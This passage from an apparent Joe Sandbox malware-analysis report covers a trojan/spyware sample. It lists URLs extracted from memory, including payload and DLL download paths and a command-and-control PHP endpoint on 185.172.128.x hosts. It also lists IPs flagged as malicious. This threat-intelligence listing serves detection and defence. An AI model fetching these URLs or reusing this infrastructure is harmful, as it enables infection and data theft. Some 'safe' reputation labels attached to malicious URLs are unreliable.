                                                  https://duckduckgo.com/chrome_newtabMSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFu3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/ac/?q=MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.vmware.com/0run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.sectigo.com0TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.u3bs.3.exe, 00000011.00000002.2974514605.0000000002686000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.indyproject.org/TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp, u3bs.3.exe, 00000011.00000002.2974514605.00000000026E2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://duckduckgo.com/chrome_newtabSMSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u3bs.0.exe, 00000001.00000003.1982604362.00000000246ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://google.comTNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpfalse
                                                                    high
                                                                    http://185.172.128.203/tiktok.exe00u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                    • 15%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://185.172.128.76/15f649199f40275b/sqlite3.dll#u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • 9%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.drfalse
                                                                      high
                                                                      http://185.172.128.76/15f649199f40275b/msvcp140.dllQu3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • 7%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://sectigo.com/CPS0DTNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exeu3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                          high
                                                                          https://pastebin.com/raw/z9pYkqPQPOdq8MSBuild.exe, 0000001B.00000002.2976876092.00000000033A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exeu3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 0000000C.00000002.2979656703.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.sqlite.org/copyright.html.u3bs.0.exe, 00000001.00000002.2999981368.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.mozilla.com/en-US/blocklist/u3bs.0.exe, u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.drfalse
                                                                                    high
                                                                                    https://mozilla.org0/nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://185.172.128.76/15f649199f40275b/freebl3.dllcu3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://185.172.128.76/15f649199f40275b/nss3.dllru3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://ocsp.thawte.com0TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.vmware.com/0/run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://185.172.128.76/3cd2b41cbde8fc9c.phpb530a5706ea79088c3d36b56fcb77release4d62687a42cd9519ca69bfu3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u3bs.0.exe, 00000001.00000003.1982604362.00000000246ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnectionrun.exe, run.exe, 00000005.00000002.2295837403.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000005.00000000.2239188364.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2727602802.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2649348113.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.drfalse
                                                                                              high
                                                                                              http://185.172.128.76/3cd2b41cbde8fc9c.phptu3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • 3%, Virustotal, Browse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.u3bs.3.exe, 00000011.00000002.2974514605.00000000026CC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              • 0%, Virustotal, Browse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.ecosia.org/newtab/MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.symauth.com/cps0(run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://pastebin.com/raw/z9pYkqPQMSBuild.exe, 0000001B.00000002.2976876092.00000000033A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bru3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://185.172.128.76/15f649199f40275b/vcruntime140.dll)u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://ac.ecosia.org/autocomplete?q=MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tTNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.symauth.com/rpa00run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exebbCu3bs.3.exe, 00000011.00000002.2969616251.00000000008D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.info-zip.org/run.exe, 00000005.00000002.2297293359.0000000003B79000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005628000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E01000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.0000000005721000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://185.172.128.203/tiktok.exet-Disposition:u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                            • 15%, Virustotal, Browse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://185.172.128.203/tiktok.exe&u3bs.0.exe, 00000001.00000002.2995019108.000000002A7E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://download.iolo.netTNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpfalse
                                                                                                            • 0%, Virustotal, Browse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-u3bs.3.exe, 00000011.00000002.2974514605.00000000026A4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://185.172.128.76u3bs.0.exe, 00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmptrue
                                                                                                            • 14%, Virustotal, Browse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://185.172.128.76/15f649199f40275b/vcruntime140.dll:u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://185.172.128.76/15f649199f40275b/nss3.dllbu3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • 3%, Virustotal, Browse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              185.172.128.90
                                                                                                              unknownRussian Federation
                                                                                                              50916NADYMSS-ASRUtrue
                                                                                                              185.172.128.228
                                                                                                              unknownRussian Federation
                                                                                                              50916NADYMSS-ASRUfalse
                                                                                                              185.172.128.203
                                                                                                              unknownRussian Federation
                                                                                                              50916NADYMSS-ASRUfalse
                                                                                                              20.157.87.45
                                                                                                              svc.iolo.comUnited States
                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                              185.172.128.76
                                                                                                              unknownRussian Federation
                                                                                                              50916NADYMSS-ASRUtrue
                                                                                                              176.97.76.106
                                                                                                              note.padd.cn.comUnited Kingdom
                                                                                                              43658INTRAFFIC-ASUAfalse
                                                                                                              185.172.128.59
                                                                                                              unknownRussian Federation
                                                                                                              50916NADYMSS-ASRUfalse
                                                                                                              239.255.255.250
                                                                                                              unknownReserved
                                                                                                              unknownunknownfalse
                                                                                                              142.251.32.100
                                                                                                              www.google.comUnited States
                                                                                                              15169GOOGLEUSfalse
                                                                                                              91.215.85.66
                                                                                                              unknownRussian Federation
                                                                                                              34665PINDC-ASRUtrue
                                                                                                              IP
                                                                                                              192.168.2.4
                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                              Analysis ID:1432428
                                                                                                              Start date and time:2024-04-27 02:18:04 +02:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 13m 0s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:28
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:TNQTc6Qmkg.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:fcac04fb67b3dec2db923867c5cb0701.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.expl.evad.winEXE@42/65@5/11
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 85%
                                                                                                              • Number of executed functions: 112
                                                                                                              • Number of non-executed functions: 248
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
